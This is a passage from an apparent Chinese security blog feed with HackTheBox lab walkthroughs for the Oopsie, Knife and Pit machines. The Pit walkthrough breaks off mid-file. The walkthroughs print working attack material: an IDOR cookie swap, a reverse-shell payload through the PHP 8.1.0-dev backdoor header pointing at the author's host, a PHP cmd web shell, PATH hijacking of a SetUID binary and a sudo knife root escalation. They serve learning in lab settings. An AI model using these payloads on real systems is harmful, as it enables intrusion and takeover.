<p>网站按钮全部无效，页面底部有邮箱 <code>admin@megacorp.com</code>可能有用。</p>
<p>其中有处内容存在提示</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/tips-Oopsite.png" alt="tips-Oopsite"></p>
<p>翻译过来为：<code>我们提供服务来操作生产数据，如报价、客户请求等。请登录以获取服务。</code></p>
<h3 id="Burpsuite"><a href="#Burpsuite" class="headerlink" title="Burpsuite"></a><strong>Burpsuite</strong></h3><p>通过<code>Burpsuite</code>截包，我们在网站地图中找到了可能的登录路径</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/login-Oopsite.png" alt="login-Oopsite"></p>
<p>直接访问<code>http://10.10.10.28/cdn-cgi/login/</code>进入登录界面</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/backlogin-Oopsite.png" alt="backlogin-Oopsite"></p>
<p>尝试登录，用户名<code>admin</code>或者<code>administrator</code></p>
<p>密码弱口令爆破无果，看了下官方WP，密码为上一台靶机Archetype的管理员密码<code>MEGACORP_4dm1n!!</code>，登录成功。</p>
<h2 id="越权"><a href="#越权" class="headerlink" title="越权"></a>越权</h2><p>简单看了一下功能，其中<code>Uploads</code>页面提示需要超级管理员权限。</p>
<p>那么接下来就是如何获取超级管理员权限看能否进行文件上传。</p>
<p>其中<code>Account</code>页面可以看到当前用户信息</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/account-Oopsite.png" alt="account-Oopsite"></p>
<p>再看Burpsuite中当前页面的请求包</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/request-Oopsite.png" alt="request-Oopsite"></p>
<p><code>GET</code>参数<code>content</code>用来进行功能页面的跳转，<code>id</code>参数作用不明</p>
<p><code>Cookie</code>中<code>user</code>、<code>role</code>分别对应<code>Access ID</code>、<code>Name</code></p>
<p>两个方向猜测：1.是否存在sql注入 2.是否存在越权漏洞</p>
<p>经过简单的测试发现sql注入行不通，尝试对<code>id</code>进行爆破。Payload可以用<code>Intruder</code>模块自带的<code>numbers</code></p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/superadmin-Oopsite.png" alt="superadmin-Oopsite"></p>
<p>结果中看到有几个id请求的响应包长度不同，其中<code>id=30</code>的响应包中发现了<code>super admin</code></p>
<p>字样，对应的<code>Access ID</code>为<code>86575</code>，直接在URL中修改<code>id=30</code>访问<code>Account</code>页面发现确实是超级管理员账号。</p>
<p>回到<code>Uploads</code>页面抓包，修改<code>Cookie</code>中的<code>user</code>值为<code>86575</code>发回数据包，可以上传文件了</p>
<h2 id="文件上传反弹shell"><a href="#文件上传反弹shell" class="headerlink" title="文件上传反弹shell"></a>文件上传反弹shell</h2><p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/uploads-Oopsite.png" alt="uploads-Oopsite"></p>
<p>文件上传shell文件（注意抓包修改user值为超级管理员），文件上传成功但是不知道上传目录，用目录扫描工具扫一下试试</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/uploadshell-Oopsite.png" alt="uploadshell-Oopsite"></p>
<p>发现uploads路径，nc监听2333端口，curl请求test.php反弹shell</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">nc -lvvp 2333 //shell中写的1234端口</span><br><span class="line">curl http://10.10.10.28/uploads/test.php</span><br></pre></td></tr></table></figure>

<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/shell-Oopsite.png" alt="shell-Oopsite"></p>
<p>查看各种目录文件，在<code>/var/www/html/cdn-cgi/login</code>中发现了<code>db.php</code>文件</p>
<p>获取内容得到本地用户<code>robert</code>的账号密码</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/dbphp-Oopsite.png" alt="dbphp-Oopsite"></p>
<p>尝试用<code>su xxxx</code>切换用户，报错：<code>su: must be run from a terminal</code></p>
<p>反弹的shell是个<code>非交互式shell</code>，非交互式shell会有很多问题，比如：</p>
<ul>
<li>无法用vim等文本编辑器</li>
<li>不能用tab补全指令</li>
<li>不能su</li>
<li>不能向上使用历史</li>
<li>…</li>
</ul>
<h3 id="知识点-交互式和非交互式"><a href="#知识点-交互式和非交互式" class="headerlink" title="知识点 交互式和非交互式"></a>知识点 交互式和非交互式</h3><p><strong>交互式模式</strong>：就是在终端上执行，shell等待你的输入，并且立即执行你提交的命令。这种模式被称作交互式是因为shell与用户进行交互。这种模式也是大多数用户非常熟悉的：登录、执行一些命令、退出。当你退出后，shell也终止了。</p>
<p><strong>非交互式模式</strong>：以shell script(非交互)方式执行。在这种模式 下，shell不与你进行交互，而是读取存放在文件中的命令,并且执行它们。当它读到文件的结尾EOF，shell也就终止了。</p>
<p>网上反弹shell升级交互式用的都是python，但是目标机子上没有python环境，然后去问了树哥，树哥说用<code>script /dev/null</code>,惊了居然su可行了！！</p>
<p>但是这个shell不是交互式的shell，算是个半交互式，不如交互式方便但也凑合</p>
<h3 id="知识点-script命令-和-dev-null"><a href="#知识点-script命令-和-dev-null" class="headerlink" title="知识点 script命令 和 /dev/null"></a>知识点 script命令 和 /dev/null</h3><p><strong>script命令</strong></p>
<p>scirpt就是一个命令，可以制作一份记录输出到终端的记录</p>
<p><strong>/dev/null</strong></p>
<p><code>/dev/null</code>代表linux的空设备文件，所有往这个文件里面写入的内容都会丢失，俗称“黑洞”</p>
<p>用途</p>
<p>1.丢弃标准输出</p>
<p>2.丢弃标准错误输出</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/nullpython-Oopsite.png" alt="nullpython-Oopsite"></p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/userflag-Oopsite.png" alt="userflag-Oopsite"></p>
<p>得到user的flag</p>
<h2 id="提权"><a href="#提权" class="headerlink" title="提权"></a>提权</h2><p>利用<a href="https://www.runoob.com/linux/linux-comm-id.html">Linux id命令</a>发现robert所在组为bugtracker</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/id-Oopsite.png" alt="id-Oopsite"></p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">find / -type f -g bugtracker 2&gt;/dev/null #Linuxfind命令 -type 设置查找类型为文件 -g 设置组为bugtracker 2&gt;/dev/null 将错误输出到/dev/null 2为Linux文件描述符（错误输出）</span><br><span class="line">ls -al /usr/bin/bugtracker Linux ls基本命令参数不多赘述</span><br></pre></td></tr></table></figure>

<p>其中有个<a href="https://www.cnblogs.com/qlqwjy/p/8665871.html">s权限</a>，当一个可执行程序具有SetUID权限，用户执行这个程序时，将以这个程序所有者的身份执行。前提是这个文件是可执行文件，可就是具有x权限(属组必须先设置相应的x权限)</p>
<p>执行<code>/usr/bin/bugtracker</code></p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/bug1-Oopsite.png" alt="bug1-Oopsite"></p>
<p>文件作用是 用户输入一个<code>BUG ID</code>输出BUG报告</p>
<p>用<a href="https://blog.csdn.net/stpeace/article/details/46641069">strings命令</a>查看<code>/usr/bin/bugtracker</code>的执行过程</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/bug2-Oopsite.png" alt="bug2-Oopsite"></p>
<p>如箭头所指，文件执行过程中调用了<code>cat</code>命令输出<code>/root/reports/</code>目录下的BUG报告</p>
<p>由于s权限，robert用户本来无权读取<code>/root/reports/</code>，现在可以了</p>
<p>我们可以构造一个恶意的cat命令来提权root</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">export PATH=/tmp:$PATH //设置环境变量到/tmp linux下的tmp目录是一个系统产生临时文件的存放目录，同时每个用户都可以对他进行读写操作</span><br><span class="line">cd /tmp/ //切换到/tmp目录下</span><br><span class="line">echo &#x27;/bin/sh&#x27; &gt; cat </span><br><span class="line">chmod +x cat //赋予执行权限</span><br></pre></td></tr></table></figure>

<p>此时，再次执行<code>/usr/bin/bugtracker</code>将会调用<code>/tmp</code>目录下的恶意cat命令，此时我们再次输入任意<code>BUG ID</code>就可以用root权限执行命令了</p>
<p><strong>注意没有变成root用户</strong></p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/root-Oopsite.png" alt="root-Oopsite"></p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/rootflag-Oopsite.png" alt="rootflag-Oopsite"></p>
<p>得到root的flag</p>
<p>end</p>
<p><strong>小结</strong></p>
<p>总的看下来这台靶机其实不算特别难，终究是自己的知识面太狭隘</p>
<h2 id="参考链接"><a href="#参考链接" class="headerlink" title="参考链接"></a>参考链接</h2><p><a href="https://blog.csdn.net/gui951753/article/details/79154496">https://blog.csdn.net/gui951753/article/details/79154496</a></p>
<p><a href="https://www.cnblogs.com/aaak/p/14067593.html">https://www.cnblogs.com/aaak/p/14067593.html</a></p>
<p><a href="https://www.linuxprobe.com/shell-dev-null.html">https://www.linuxprobe.com/shell-dev-null.html</a></p>
]]></content>
      <tags>
        <tag>渗透测试</tag>
        <tag>HackTheBox</tag>
      </tags>
  </entry>
  <entry>
    <title>HackTheBox-Knife</title>
    <url>/2022/01/07/HackTheBox-Knife/</url>
    <content><![CDATA[<h1 id="Hackthebox-Knife"><a href="#Hackthebox-Knife" class="headerlink" title="Hackthebox-Knife"></a>Hackthebox-Knife</h1><p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/Pwned.png" alt="Pwned"></p>
<span id="more"></span>

<blockquote>
<p>本机IP：10.10.16.6</p>
<p>目标IP：10.10.10.242</p>
</blockquote>
<h2 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>信息收集</h2><p><strong>nmap</strong></p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/Knife_nmap.png" alt="nmap"></p>
<p>开放了22和80端口，直接访问看看网站功能</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/web.png" alt="web"></p>
<p>上面导航栏是假的根本点不了，<code>ctrl+u</code>查看网页源代码，似乎就当前页面</p>
<p><strong>Dirsearch</strong></p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/dirsearch.png" alt="dirsearch"></p>
<p>访问<code>../login</code>，和<code>index.php</code>一模一样</p>
<h2 id="发现漏洞（PHP8-1-0-dev开发版本后门）"><a href="#发现漏洞（PHP8-1-0-dev开发版本后门）" class="headerlink" title="发现漏洞（PHP8.1.0-dev开发版本后门）"></a>发现漏洞（PHP8.1.0-dev开发版本后门）</h2><p><strong>Burpsuite</strong></p>
<p>发现请求头有问题</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/head.png" alt="head"></p>
<p><code>PHP/8.1.0-dev backdoor rce</code>在某场CTF比赛里碰到过</p>
<p>攻击者可以通过发送<code>User-Agentt</code>头来执行任意代码（具体网上都能查到）</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/PHP810backdoor.png" alt="PHP810backdoor"></p>
<h2 id="反弹Shell"><a href="#反弹Shell" class="headerlink" title="反弹Shell"></a>反弹Shell</h2><p>添加请求头<code>User-Agentt: zerodiumsystem(&quot;/bin/bash -c &#39;bash -i &gt;&amp; /dev/tcp/10.10.16.6/2333 0&gt;&amp;1&#39;&quot;);</code></p>
<p>监听2333端口成功反弹shell</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/getshell.png" alt="getshell"></p>
<p>在james用户主目录得到<code>user flag</code></p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/userflag.png" alt="userflag"></p>
<h2 id="提权"><a href="#提权" class="headerlink" title="提权"></a>提权</h2><p>查看james用户的sudo权限</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/jamessudo.png" alt="jamessudo"></p>
<p>可以无密码运行<code>/usr/bin/knife</code></p>
<p>Google上搜一下<strong>Knife</strong> ，发现是一个命令行工具</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/aboutKnife.png" alt="aboutKnife"></p>
<p><code>sudo knife</code>运行可以看到Knife的各种命令参数</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/knife.png" alt="knife"></p>
<p>其中有一个exec 我们似乎可以利用</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/knifeexec.png" alt="knifeexec"></p>
<p>看一下用法</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/useexec.png" alt="useexec"></p>
<blockquote>
<p>Knife exec有两个参数</p>
<p>-E CODE<code>, </code>–exec CODE</p>
<p>A string of code to be executed.</p>
<p>-p PATH:PATH<code>, </code>–script-path PATH:PATH</p>
<p>A colon-separated path at which Ruby scripts are located. Use to override the default location for scripts. When this option is not specified, knife will look for scripts located in <code>chef-repo/.chef/scripts</code> directory.</p>
</blockquote>
<p>用 Ruby 代码执行 shell 脚本的方式放在参考链接第二个了，<code>system</code>的用法其实没啥区别</p>
<p>接下来可以提权了</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">sudo knife exec -E &quot;system(&#x27;/bin/sh -i&#x27;)&quot; //-i：实现脚本交互</span><br></pre></td></tr></table></figure>

<p>可以看到我们已经拿到root的权限了</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/root.png" alt="root"></p>
<p>注意，如果shell没有升级情况如下，升级一下就行（另一台靶机记录里写过，姿势很多）</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/error.png" alt="error"></p>
<p>接下来可以去找root的flag了</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/rootflag.png" alt="rootflag"></p>
<p>end</p>
<h2 id="写在最后"><a href="#写在最后" class="headerlink" title="写在最后"></a>写在最后</h2><p>最近渗透靶机做的多了，对整个流程也熟悉了起来，由于漏洞点比赛碰到过可能没怎么卡壳</p>
<p>本台靶机对我来说难点还是在提权吧，提权的方法和知识还是需要多多学习</p>
<p>Google搜索信息也是解题不可分割的一环，碰到没见过的东西要现学现用</p>
<h2 id="参考链接"><a href="#参考链接" class="headerlink" title="参考链接"></a>参考链接</h2><p><a href="https://docs.chef.io/workstation/knife/">https://docs.chef.io/workstation/knife/</a></p>
<p><a href="http://thelazylog.com/executing-shell-script-from-ruby-code/">http://thelazylog.com/executing-shell-script-from-ruby-code/</a></p>
]]></content>
      <tags>
        <tag>渗透测试</tag>
        <tag>HackTheBox</tag>
      </tags>
  </entry>
  <entry>
    <title>HackTheBox-Pit</title>
    <url>/2022/01/07/HackTheBox-Pit/</url>
    <content><![CDATA[<h1 id="Hackthebox-Pit"><a href="#Hackthebox-Pit" class="headerlink" title="Hackthebox-Pit"></a>Hackthebox-Pit</h1><p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/Pit_pwn.png" alt="pwn"></p>
<span id="more"></span>

<blockquote>
<p>目标IP：10.10.10.241</p>
<p>本机IP：10.10.16.12</p>
</blockquote>
<h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>本文主要想记录一下对HackTheBox靶机Pit的渗透过程，涉及以下知识点：</p>
<p>1.snmp和snmpwalk工具使用</p>
<p>2.CVE-2019-12744</p>
<p>3.利用本地环境写入authorized_keys文件实现ssh免密登录root</p>
<p>难度中上，文中如果表述或者操作有问题欢迎各位师傅指出</p>
<h2 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>信息收集</h2><p><strong>nmap</strong></p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/Pit_nmap.png" alt="nmap"></p>
<p>开放了22、80、9090端口，还是从80端口开始看</p>
<p>访问<code>10.10.10.241:80</code>只是个Nginx服务器搭建成功界面，没有可以利用的点</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/80.png" alt="80"></p>
<p>再看下9090端口，nmap扫出来一个<code>Zeus-admin?</code>去google一下，没有文章写的很清楚。</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/9090.png" alt="9090"></p>
<p>查看源码发现了有用信息</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/cockpit.png" alt="cockpit"></p>
<p>9090端口装了Cockpit</p>
<blockquote>
<p>Linux Cockpit 是一个基于Web 界面的应用，它提供了对系统的图形化管理。 … 它是一个用户友好的基于web 的控制台，提供了一些非常简单的方法来管理Linux 系统—— 通过web。 你可以通过一个非常简单的web 来监控系统资源、添加或删除帐户、监控系统使用情况、关闭系统以及执行其他一些其他任务。</p>
</blockquote>
<p>在<a href="https://www.exploit-db.com/">exp库</a>上看看有没有Cockpit的漏洞exp可利用，但是在源码中没有找到关于Cockpit的版本信息 暂时放一放</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/hosts.png" alt="hosts"></p>
<p>还找到了域名<strong>dms-pit.htb</strong>和<strong>pit.htb</strong>  加入到<code>/etc/hosts</code>里方便解析域名</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/etchost.png" alt="etchost"></p>
<p>尝试用**<a href="https://github.com/OJ/gobuster">Gobuster</a>**工具进行目录扫描，没有有用的发现</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">gobuster dir -u http://dms-pit.htb/ -w /usr/share/wordlists/dirb/big.txt -t 200 --wildcard</span><br></pre></td></tr></table></figure>

<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/Pit_gobuster.png" alt="Pit_gobuster"></p>
<p>做到这里我没思路了，nmap端口扫描的默认协议为TCP，实际上应该扫描一下UDP端口就有思路继续做下去了，还是经验不足吧</p>
<p>这里卡壳了去看了下官推给的提示</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/hint.png" alt="hint"></p>
<p>这个提示我自认为不是很明显，后来找了半天原来是snmpwalk的意思</p>
<blockquote>
<p>snmpwalk是SNMP的一个工具，它使用SNMP的GETNEXT请求查询指定OID（SNMP协议中的对象标识）入口的所有OID树信息，并显示给用户。通过snmpwalk也可以查看支持SNMP协议（可网管）的设备的一些其他信息，比如cisco交换机或路由器IP地址、内存使用率等，也可用来协助开发SNMP功能。</p>
<p>在日常监控中,经常会用到snmp服务,而snmpwalk命令则是采集系统各种信息最有效的方法。</p>
</blockquote>
<p><strong>什么是snmp？</strong></p>
<blockquote>
<p> <strong>SNMP</strong>是英文”<strong>Simple Network Management Protocol</strong>“的缩写，中文意思是”<strong>简单网络管理协议</strong>“。<strong>SNMP是一种简单网络管理协议，它属于TCP/IP五层协议中的应用层协议，用于网络管理的协议。SNMP主要用于网络设备的管理。由于SNMP协议简单可靠 ，受到了众多厂商的欢迎，成为了目前最为广泛的网管协议。</strong></p>
<p> SNMP 和 UDP</p>
<p> SNMP采用UDP协议在管理端和agent之间传输信息。 SNMP采用UDP 161端口接收和发送请求，162端口接收trap，执行SNMP的设备缺省都必须采用这些端口。SNMP消息全部通过UDP端口161接收，只有Trap信息采用UDP端口162。</p>
</blockquote>
<p>那接下来我们应该就是通过snmpwalk得到某些信息继续做下去了</p>
<p>扫描发现161和162端口开放</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/udp%E7%AB%AF%E5%8F%A3.png" alt="udp端口"></p>
<p>通过<a href="https://github.com/dheiland-r7/snmp">工具</a>从目标系统中提取SNMP数据</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">snmpbw.pl target community timeout threads</span><br></pre></td></tr></table></figure>

<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/snmp%E5%B7%A5%E5%85%B7.png" alt="snmp工具"></p>
<p>得到<code>10.10.10.241.snmp</code>文件，从中发现</p>
<blockquote>
<p>Linux版本：Linux pit.htb 4.18.0-240.22.1.el8_3.x86_64</p>
<p>很多目录</p>
<p>username：michelle</p>
</blockquote>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/%E6%B3%84%E9%9C%B2%E4%BF%A1%E6%81%AF2.png" alt="泄露信息2"></p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/%E6%B3%84%E9%9C%B2%E4%BF%A1%E6%81%AF1.png" alt="泄露信息1"></p>
<p>搜一下seeddms，发现SeedDMS是个文档管理系统</p>
<p>访问<code>http://dms-pit.htb/seeddms51x/seeddms</code></p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/SeedDMS.png" alt="SeedDMS"></p>
<p>用<code>michelle</code>这个用户测试登录，简单测试了几个密码发现密码就是用户名，成功登录SeedDMS</p>
<p>其中发现了一个更新日志，管理员把SeedDMS的版本从5.1.10升级到了5.1.15，CHANGELOG中也显示最后的更新记录升级到了5.1.15版本，去<a href="https://www.exploit-db.com/">exp库</a>看看有无可利用的漏洞</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/changelog.png" alt="changelog"></p>
<p>可能是官方设计的时候出了问题，整合目前可以得到的所有信息，这台机子的渗透已经做不下去了，如果真和更新日志里写的一样，5.1.15版本没有已知可用的exp。</p>
<p>看了几篇国外大佬的博客，做到这普遍存在一个疑问就是：日志中明确写到5.1.11版本修复了 CVE-2019-12744，为什么这里CVE-2019-12744的exp还是可以利用? </p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/fixinfo.png" alt="fixinfo"></p>
<p>没办法，就当5.1.10版本继续做下去</p>
<h2 id="漏洞利用"><a href="#漏洞利用" class="headerlink" title="漏洞利用"></a>漏洞利用</h2><p>用CVE-2019-12744的exp可以实现<strong>远程命令执行</strong></p>
<p><strong>参链</strong>：<a href="https://www.exploit-db.com/exploits/47022">https://www.exploit-db.com/exploits/47022</a></p>
<p>SeedDMS中进入<strong>michelle</strong>用户目录下添加<code>1.php</code>文档并上传本地的<code>backdoor.php</code>,内容如下</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="comment">//backdoor.php</span></span><br><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_REQUEST</span>[<span class="string">&#x27;cmd&#x27;</span>]))&#123;</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">&quot;&lt;pre&gt;&quot;</span>;</span><br><span class="line">        <span class="variable">$cmd</span> = (<span class="variable">$_REQUEST</span>[<span class="string">&#x27;cmd&#x27;</span>]);</span><br><span class="line">        system(<span class="variable">$cmd</span>);</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">&quot;&lt;/pre&gt;&quot;</span>;</span><br><span class="line">        <span class="keyword">die</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/Pit_upload.png" alt="upload"></p>
<p>添加成功以后，看一下<code>1.php</code>的文档id(URL中可一看到document_id=xxx)，接下来可以通过cmd传参执行远程命令了</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">http://dms-pit.htb/seeddms51x/data/1048576/30/1.php?cmd= </span><br><span class="line">#我的1.php文档ID是30 </span><br><span class="line">#这里的“data”和“1048576”是保存上传文件的默认文件夹。</span><br></pre></td></tr></table></figure>

<p>查看下<code>/etc/passwd</code></p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/etcpasswd.png" alt="etcpasswd"></p>
<p>浏览目录文件在<code>/var/www/html/seeddms51x/conf</code>目录下发现了配置文件<code>settings.xml</code></p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">http://dms-pit.htb/seeddms51x/data/1048576/30/1.php?cmd=ls /var/www/html/seeddms51x/conf</span><br></pre></td></tr></table></figure>

<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/%E9%85%8D%E7%BD%AE%E4%BF%A1%E6%81%AF.png" alt="配置信息"></p>
<p><strong>settings.xml</strong></p>
<figure class="highlight xml"><table><tr><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">pre</span>&gt;</span><span class="meta">&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">configuration</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">site</span>&gt;</span></span><br><span class="line">    <span class="comment">&lt;!-- siteName: Name of site used in the page titles. Default: SeedDMS</span></span><br><span class="line"><span class="comment">       - foot<span class="doctag">Note:</span> Message to display at the bottom of every page</span></span><br><span class="line"><span class="comment">       - printDisclaimer: if true the disclaimer message the lang.inc files will be print on the bottom of the page</span></span><br><span class="line"><span class="comment">       - language: default language (name of a subfolder in folder &quot;languages&quot;)</span></span><br><span class="line"><span class="comment">       - theme: default style (name of a subfolder in folder &quot;styles&quot;)</span></span><br><span class="line"><span class="comment">    --&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">display</span> <span class="attr">siteName</span>=<span class="string">&quot;SeedDMS&quot;</span> <span class="attr">footNote</span>=<span class="string">&quot;SeedDMS free document management system - www.seeddms.org&quot;</span> <span class="attr">printDisclaimer</span>=<span class="string">&quot;true&quot;</span> <span class="attr">language</span>=<span class="string">&quot;en_GB&quot;</span> <span class="attr">theme</span>=<span class="string">&quot;bootstrap&quot;</span> <span class="attr">previewWidthList</span>=<span class="string">&quot;40&quot;</span> <span class="attr">previewWidthDetail</span>=<span class="string">&quot;100&quot;</span> <span class="attr">availablelanguages</span>=<span class="string">&quot;&quot;</span> <span class="attr">showFullPreview</span>=<span class="string">&quot;false&quot;</span> <span class="attr">convertToPdf</span>=<span class="string">&quot;false&quot;</span> <span class="attr">previewWidthMenuList</span>=<span class="string">&quot;40&quot;</span> <span class="attr">previewWidthDropFolderList</span>=<span class="string">&quot;100&quot;</span> <span class="attr">maxItemsPerPage</span>=<span class="string">&quot;0&quot;</span> <span class="attr">incItemsPerPage</span>=<span class="string">&quot;0&quot;</span>&gt;</span>  </span><br><span class="line">    <span class="tag">&lt;/<span class="name">display</span>&gt;</span></span><br><span class="line">    <span class="comment">&lt;!-- strictFormCheck: Strict form checking. If set to true, then all fields in the form will be checked for a value. If set to false, then (most) comments and keyword fields become optional. Comments are always required when submitting a review or overriding document status.</span></span><br><span class="line"><span class="comment">       - viewOnlineFileTypes: files with one of the following endings can be viewed online (USE ONLY LOWER CASE CHARACTERS)</span></span><br><span class="line"><span class="comment">       - enableConverting: enable/disable converting of files</span></span><br><span class="line"><span class="comment">       - enableEmail: enable/disable automatic email notification</span></span><br><span class="line"><span class="comment">       - enableUsersView: enable/disable group and user view for all users</span></span><br><span class="line"><span class="comment">       - enableFullSearch: false to don&#x27;t use fulltext search</span></span><br><span class="line"><span class="comment">       - enableLanguageSelector: false to don&#x27;t show the language selector after login</span></span><br><span class="line"><span class="comment">       - enableClipboard: false to hide the clipboard</span></span><br><span class="line"><span class="comment">       - enableFolderTree: false to don&#x27;t show the folder tree</span></span><br><span class="line"><span class="comment">       - expandFolderTree: 0 to start with tree hidden</span></span><br><span class="line"><span class="comment">       -                   1 to start with tree shown and first level expanded</span></span><br><span class="line"><span class="comment">       -                   2 to start with tree shown fully expanded     </span></span><br><span class="line"><span class="comment">       - stopWordsFile: path to stop word file for indexer</span></span><br><span class="line"><span class="comment">       - sortUsersInList: how to sort users in lists (&#x27;fullname&#x27; or &#x27;&#x27; (default))</span></span><br><span class="line"><span class="comment">    --&gt;</span>   </span><br><span class="line">    <span class="tag">&lt;<span class="name">edition</span> <span class="attr">strictFormCheck</span>=<span class="string">&quot;false&quot;</span> <span class="attr">viewOnlineFileTypes</span>=<span class="string">&quot;.txt;.text;.html;.htm;.xml;.pdf;.gif;.png;.jpg;.jpeg&quot;</span> <span class="attr">enableConverting</span>=<span class="string">&quot;true&quot;</span> <span class="attr">enableEmail</span>=<span class="string">&quot;true&quot;</span> <span class="attr">enableUsersView</span>=<span class="string">&quot;true&quot;</span> <span class="attr">enableFullSearch</span>=<span class="string">&quot;true&quot;</span> <span class="attr">enableClipboard</span>=<span class="string">&quot;false&quot;</span> <span class="attr">enableFolderTree</span>=<span class="string">&quot;true&quot;</span> <span class="attr">expandFolderTree</span>=<span class="string">&quot;1&quot;</span> <span class="attr">enableLanguageSelector</span>=<span class="string">&quot;true&quot;</span> <span class="attr">stopWordsFile</span>=<span class="string">&quot;&quot;</span> <span class="attr">sortUsersInList</span>=<span class="string">&quot;&quot;</span> <span class="attr">enableDropUpload</span>=<span class="string">&quot;false&quot;</span> <span class="attr">enableRecursiveCount</span>=<span class="string">&quot;false&quot;</span> <span class="attr">maxRecursiveCount</span>=<span class="string">&quot;0&quot;</span> <span class="attr">enableThemeSelector</span>=<span class="string">&quot;false&quot;</span> <span class="attr">fullSearchEngine</span>=<span class="string">&quot;sqlitefts&quot;</span> <span class="attr">sortFoldersDefault</span>=<span class="string">&quot;u&quot;</span> <span class="attr">editOnlineFileTypes</span>=<span class="string">&quot;&quot;</span> <span class="attr">enableMenuTasks</span>=<span class="string">&quot;false&quot;</span> <span class="attr">enableHelp</span>=<span class="string">&quot;false&quot;</span> <span class="attr">defaultSearchMethod</span>=<span class="string">&quot;database&quot;</span> <span class="attr">libraryFolder</span>=<span class="string">&quot;0&quot;</span> <span 